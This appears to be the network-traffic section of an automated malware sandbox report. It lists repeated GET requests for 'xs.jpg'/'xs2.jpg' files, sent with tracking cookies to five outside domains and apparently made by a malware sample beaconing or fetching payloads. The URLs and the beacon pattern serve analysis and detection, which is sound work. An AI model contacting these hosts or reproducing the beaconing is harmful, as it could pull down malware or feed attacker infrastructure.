        Source: global trafficHTTP traffic detected: GET /xs.jpg?14e27329=1051154811 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?155951b4=716350312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1651959c=1123336404 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159307|1720159259|3|13|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?16b3e9bb=-2009630110 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159307|1720159259|3|13|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?170da52a=1547080872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159308|1720159260|3|13|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1786b5d7=1578817372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?180330c9=1611449124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?18be425f=-973991176 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159310|1720159259|3|14|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?194bc1b3=-1324200987 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159311|1720159259|3|14|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?19b3dafe=-414010642 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159312|1720159260|3|14|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?19fa4aca=871667092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1a87f96c=-1624254328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1b477e89=-633605048 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159314|1720159259|3|15|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1bf90ddb=938613686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159315|1720159259|3|15|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1c4eb48e=-970526750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159315|1720159260|3|15|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1c954dcc=1438640484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1d468c2f=-1839153941 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1e16c26e=-1770927066 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1ec6b77a=-1713269406 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1fd1e84b=533850187 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?20c162b1=-1547244171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?211be604=-406631908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2373b5c6=-1915824360 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?24e8c9b5=619235765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?253cedcf=1874250093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?26879fc4=1522834916 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?27f237dd=396330763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?29ccf744=-1489773296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2bcaf743=1582807576 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2ca70649=-1098498342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2cfced02=1509546500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?2e7d9d4b=1944906328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3c09d975=2014556906 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3d14cd8b=633027043 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3e44093b=-116382484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159330|1720159260|3|19|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3f86f717=1002352591 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?41d7fe37=-1961888438 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?445d8e02=-561061362 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159333|1720159259|3|20|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?45cf8c26=389951640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159334|1720159259|3|20|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4666d3a0=-1073462208 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159334|1720159260|3|20|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?47518eef=-1901912610 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?494885e8=-1819495128 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4e1a4979=218554042 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159337|1720159259|3|21|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?4fe5ce70=1066875328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159338|1720159259|3|21|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?50eb79ae=-222139126 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159338|1720159260|3|21|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?54bd4f7c=-29888908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5bf62f02=667228684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5fcee9d4=-1633131316 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159342|1720159259|4|22|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?66b9efaa=-1696088408 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159342|1720159259|3|22|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?6c8a2c8f=-1305955780 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159343|1720159260|4|22|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6e4b76cf=-594088546 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?72a457e7=1026930563 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7a6a3bf3=-187402266 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159345|1720159259|3|23|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7f8f3cd8=-14779984 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159346|1720159259|3|23|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8644bbad=-1200973547 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159346|1720159260|3|23|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?8cd08851=-1502504717 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?908734c0=-1522004096 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9a275efc=46455532 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159349|1720159259|3|24|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9ffb83c1=-1075505530 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159350|1720159259|3|24|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?a5ab2386=-2018641750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159351|1720159260|4|24|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a9db6871=-1485987388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?adce999d=316119470 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bbd2b314=-1424130204 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159354|1720159259|4|25|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c1df27dd=251215592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159354|1720159259|3|25|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c3baede6=500657968 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159355|1720159260|4|25|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c750acd5=-1902028374 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?cbebb896=1673734594 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d597c30b=-2134423263 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159357|1720159259|3|26|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?defe4bdb=972408610 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159358|1720159259|3|26|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e806d3ea=675115834 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159359|1720159260|4|26|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ed0b353e=-954097734 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f50273b1=-1659498183 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
